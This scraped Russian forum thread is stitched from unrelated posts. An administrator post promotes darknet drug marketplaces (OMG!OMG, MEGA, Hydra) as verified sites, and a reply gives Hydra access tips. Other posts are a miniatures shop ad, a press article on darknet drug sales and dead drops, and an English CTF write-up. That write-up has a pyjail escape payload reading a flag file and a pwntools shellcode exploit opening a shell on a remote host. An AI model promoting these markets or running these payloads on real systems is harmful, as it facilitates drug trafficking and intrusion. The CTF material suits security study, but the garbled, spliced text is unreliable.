Официальная ссылка hydra

Umujer

Администратор
Подтвержденный
Сообщения
729
Реакции
46
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Sytalu

Местный
Сообщения
102
Реакции
14
Официальная ссылка hydra
Как правильно зайти на сайт гидрыSulebomoКак выглядит правильный сайт http omgruzxpnew4af. На главной странице Gidra вы всегда увидите проверочный код, который нужно ввести правильно, в большинстве случаев требуется более одной попытки. Зайти на гидру можно также с помощью веб зеркало, если вы хотите зайти из России, вероятнее всего вам понадобится…
 

Epiziqo

Местный
Сообщения
54
Реакции
23
Belgian Infantry WaterlooDutch infantry WaterlooDutch Militia Waterloo Popular ProductsAll productsCampaign Game Minatures is the best place to find your figures and get a personal service second to none.We have 21 years experience, our make of figures called CGM and we stock makes such as Mirliton, Xyston, Perry Miniatures, Buaeda, Minairons, Victrix, Spanish Tercios, Black Scorpion, and 1-48 Tactica as well as the Bolt action ranges, games, books and rules, including our own Imperial Eagle with the Scenario book Borodino and the army lists for Eckmuhl. CGM figures include Napoleonic, Ancients with Cesaerian Roman, Imperial Roman and Gauls and also WW2 infantry. El Cid and his men are coming along with new Napoleonic figures and equipment like wagons.The web has been updated and e-mails are working so you can contact us and place orders. You get an invoice and a message when you order. If you have problems logging in to your account contact me at [email protected] the navigation catergories to find your way around.
Официальная ссылка hydra
 

Yqizy

Юзер
Сообщения
31
Реакции
3
Если что-то запрещено, это значит только то, что это "что-то" трудно достать. А значит, оно и стоит дороже. Dp.ru выяснил, сколько и на чем зарабатывают петербургские онлайн-магазины в глубоком интернете, и почему наркотики с улиц спальных районов переместились в сеть.Когда вы что-то покупаете, даже в интернете, продавец вас обычно прекрасно "видит" - вы оставляете адрес для доставки, данные банковской карты, и IP-адрес. А потом несколько недель видите в браузере рекламу с товаром, который вы искали. На самом деле, способ анонимных покупок через интернет уже давно существует. Правда, пользуются им в основном для незаконных сделок, но интерес к нему проявляют и обычные предприниматели."Дипвеб", или "глубокий интернет" - это сайты, которые не индексируют обычные поисковые системы; в России он начал “выходить в массы” в 2013-14 годах, на Западе распространился на несколько лет раньше. Если ввести адрес такой страницы в строке обычного браузера, она не откроется; вы увидите сообщение “время ожидания ответа от сервера истекло”. Зайти на такой сайт можно через специальный браузер Tor. Систему Tor разработали по госзаказу специалисты исследовательской лаборатории ВМС США для военных целей, а код опубликовали под свободной лицензией. "Тором" стали пользоваться сначала специалисты по криптографии, а затем и все желающие. Суть системы - в анонимности. То есть, пользователя невозможно "вычислить по айпи", браузер связывается с сайтом через несколько разных узлов в разных странах. Именно поэтому он быстро стал площадкой для торговли наркотиками, оружием и другими запрещенными веществами.Оружие и дизайнПо данным Оксфордского интернет-института, более всего глубокий интернет распространен в Италии, Израиле и Молдавии, там Tor используют более 200 человек на 100 тысяч жителей. В России - 25-50 пользователей на 100 тысяч человек. В Петербурге, по разным оценкам, в "глубокий интернетом" регулярно погружаются около 6-7 тысяч человек. Немалая часть из них - покупатели и продавцы наркотиков.Глубокий интернет выглядит как обычная сеть середины нулевых: вместо вытеснивших почти все остальное соцсетей, привычных приложений и новостных сайтов, там - форумы, чаты и интернет-магазины. Это объяснимо: соцсети как раз построены на неанонимности, поэтому в "Торе" пришлось вернуться к старым форматам.Самые масштабные форумы, как в России, так и в мире, занимаются в том числе продажей наркотиков. По большинству оценок, более 90% торгового оборота магазинов в "Торе" - наркотические вещества, остальное - оружие, фальшивые документы, банковские карты, оформленные на несуществующих людей. На одном крупном российском форуме есть целый раздел дизайн-услуг: иллюстраторы оформляют интернет-магазины для продажи запрещенных товаров, рисуют им логотипы и фирменный стиль.На мировом рынке крупнейшей площадкой долго был Silk Road (в переводе с английского "шелковый путь", так же называется один из основных мировых маршрутов наркотрафика). Площадка работала с 2011 по 2013 год - запрещенные психоактивные вещества составляли 70% товаров, кроме них продавались электронные копии книг, порнография. Администратора форума ФБР задержало в 2013 году, за 2,5 предыдущих года служба оценила оборот Silk Road в 9,5 млн биткоинов. Это по нынешнему курсу 2,2 трлн рублей (в то время - около 600 млрд рублей).Большинство основателей крупных форумов и интернет-магазинов в "глубоком интернете" не были до этого преступниками в реальном мире. Причастными к торговле наркотиками и оружием они становились уже потом, используя собственноручно созданные сайты. А объясняют свои мотивы создатели дипвеба принципами криптоанархизма - это часть либертарианской философии. Криптоанархисты ратуют за свободный рынок, где продавца и покупателя никто не контролирует (но и не защищает), анонимную торговлю и защиту персональных данных в сети."Я покупал через форумы “Тора” регулярно, сколько точно раз, не помню, но счет на десятки", - рассказывает один из пользователей "глубокого интернета" на анонимном форуме. Он, как и многие пользователи “Тора”, увлекается поиском ошибок в коде, например, "вскрывает" онлайн-тесты, которые задают ему в институте, чтобы получить хорошие оценки. Он рассказывает, что пару лет назад, до распространения "глубокого интернета", покупал "товар" у знакомых - через несколько "рукопожатий" в Петербурге всегда было несложно найти психоактивные вещества. Но в интернет-магазинах - удобнее, поэтому на улицах города стало меньше нарисованных баллончиком номеров телефона с подписью "соли" и "спайсы".Автор: Алёна ПылаеваГде лежат закладкиТеперь можно сказать, что немалая часть наркорынка ушла в интернет. Интернет-магазины дипвеба - это, хоть и нелегальные, но хорошо структурированные организации. У них есть основатели-администраторы, поставщики и "штат" кладовщиков, или "кладменов". Задача последних - хранение, фасовка, упаковка и доставка товара. Это происходит через "закладки". Лично кладовщик и покупатель не встречаются, общаются только через интернет. После оплаты кладмен оставляет товар в каком-то незаметном месте в городе, описывает покупателю маршрут, а покупатель в назначенном месте товар забирает. Обычно все это укладывается в один день: у многих магазинов есть представительства и склады в большинстве крупных городов России. “Закладка может быть где угодно, вот хоть за батареей в кафе у тебя за спиной, - говорит тот же пользователь. - Бывают закладки прямо напротив отделений полиции, под видеокамерами, или на козырьках подъездов, некоторые потом тогда жалуются магазину, что не могут достать из-за роста, хоть стремянку носи. Есть неудачные места, где может закладку унести ветром, или дворник смести. а покупатель потом, естественно, уже не находит”. Он добавляет, что политика в отношении таких ситуаций у магазинов разная: кто-то "перезакладывает", кто-то нет.Крупный предмет, можно, например, закопать под дорожным знаком или помеченным деревом. “Как-то раз я ездил за товаром в промзону на Парнас, поднимался на 28 этаж недостроенного дома, - рассказывает он. - Иногда к маршруту добавляют фотографии, выделяя место, где лежит "клад", но их делают обычно в темноте плохой камерой, так что это просто красный круг на черном фоне”.Платят за товары в дипвебе биткоинами - криптовалютой, которую исследователь ООН Бретт Скотт назвал "слишком либертарианской", имея в виду, что ее не контролирует ни одно государство и ни один регулятор. Биткоины переходят прямо из кошелька в кошелек, минуя банки, и остановить это почти невозможно - только если отобрать у пользователей телефоны. "Рубли в биткоины переводят сами площадки, комиссия у них довольно высокая и зависит от того, насколько сильно "скачет" курс. Если изменения сильные - могут брать 25%", - рассказывает один из участников форума.На форумах в "Торе" можно много чего купить - например, участники кофейного кооператива "Черный" начали продавать на форумах "глубокого интернета" кофе. Это имиджевая акция: предприниматели хотели создать образ чего-то запретного, интересного, "кофемании". Только вместо "закладок" - обычная доставка. Артем Темиров, участник кооператива "Черный", рассказывает, что чтобы купить кофе, нужно, естественно, сначала скачать браузер Tor. “Регистрироваться в нашем онлайн-магазине в Tor не нужно, потому что это противоречит принципам даркнета и теряет весь смысл. Регистрация - это потеря анонимности, - поясняет он. - Пользователь вставляет в строку в браузере доменное имя нашего магазина, выбирает сорт кофе, и оплачивает либо биткоинами, либо через киви-кошелек. Мы получаем информацию об оплате и почту покупателя, уточняем у него адрес, если это не Москва, и отправляем кофе”.Автор: Алёна ПылаеваКак найти продавцаУ всех участников рынка в глубоком интернете своя мотивация. Магазины получают прибыль с меньшими рисками и размещают объявления о вакансиях для фасовщиков и кладовщиков. На такой работе не спрашивают об образовании, судимостях, а заработок "кладовщиков", которые согласились анонимно назвать свою “зарплату” - в среднем около 150 тыс. рублей. Покупателей тоже становится больше: процедура покупки упростилась почти до уровня обычного интернет-заказа. “Кого тут только нет”, - удивляется вопросам корреспондентки dp.ru администратор одного из российских интернет-магазинов. Он уверен, что рынок “психоактивных веществ” существует пока в таком, скрытом виде только пока “культура потребления не сформирована”. Деанонимизировать пользователя “тора” пока можно только “извне”, то есть если он допустит ошибку в обычном интернете или в реальности. Например, основателя Silk Road Уильяма Росса Ульбрихта агенты ФБР начали подозревать, когда нашли посты с рекламой Silk Road под псевдонимом altoid. То же имя Ульбрихт использовал в объявлении о вакансии для программистов, указав адрес личной электронной почты. Несколько "кладовщиков" и производителей синтетических наркотиков российская полиция находила после звонков соседей, которые жаловались на странный запах.Автор: Алёна ПылаеваВ целом к полиции пользователи дипвеба относятся снисходительно. "Я уверен, ни у полиции, ни у российских спецслужб не хватит компетентности для того, чтобы закрыть магазин или запретить криптовалюты", - говорит один из администраторов магазина на форуме. И пока это похоже на правду: "Наркодилеры стараются найти потенциальных покупателей через сайты и социальные сети, мобильные приложения типа "Вайбер", "Ватсап", Телеграм, - гласит один из немногих отчетов о работе МВД в сети. - Сотрудниками УКОН (ГУКОН МВД, которое контролирует оборот наркотиков после ликвидации ФСКН) постоянно осуществляется мониторинг интернета для выявления ресурсов, пропагандирующих наркотические средства и психотропные вещества. Только в 1 квартале текущего года обнаружены 11 электронных адресов, предположительно содержащих информацию с признаками рекламы и пропаганды наркотиков, распространение которой на территории России запрещено. В Роскомнадзор направлены заявки на проведение проверки с целью закрытия этих сайтов".В ГУ МВД в ответ на запрос dp.ru ответили, что за 2016 год правоохранительные органы в Петербурге раскрыли 7,5 тыс наркопреступлений, в 2015 году - 8 тыс. "Всего в регионе за 2016 год изъято более 1,5 тонн психотропных веществ, за 4 месяца 2017 года - 400 кг", - сообщают в МВД, добавляя, что криминогенная обстановка, связанная с незаконным оборотом наркотиков, уже несколько лет остается довольно стабильной. "Борьба с наркопреступлениями, совершенными с использованием интернет-технологий, находится на особом контроле ГУ МВД по Петербургу и Ленобласти", - подчеркнули в ведомстве.И в целом по России, по данным ФСКН и ГУКОН МВД, с 2012 года показатели раскрываемости наркопреступлений не сильно меняются: в год раскрывают 80-120 тыс преступлений. На крупнейшей в русском "дипнете" "Гидре" (те же самые люди работают и на других форумах, у них есть постоянные бренды и покупатели) -  приблизительно 108 магазинов, которые работают в Петербурге. Крупнейшие совершили по 5-15 тыс сделок, небольшие - по 100-200, в среднем - около 2 тысяч сделок на магазин (эта информация указана у них в профиле). По данным администратора одного из магазинов, средний счет покупки, с учетом оптовых - около 6-10 тыс рублей. В итоге, по оценкам магазинов, годовая выручка одного интернет-магазина около 150 млн рублей, совокупная выручка петербургских филиалов - от 2 млрд рублей в год.
 
D

Dynegu

Юзер
Сообщения
92
Реакции
6
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l != 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside,  bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if ( !(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
 
Сверху Снизу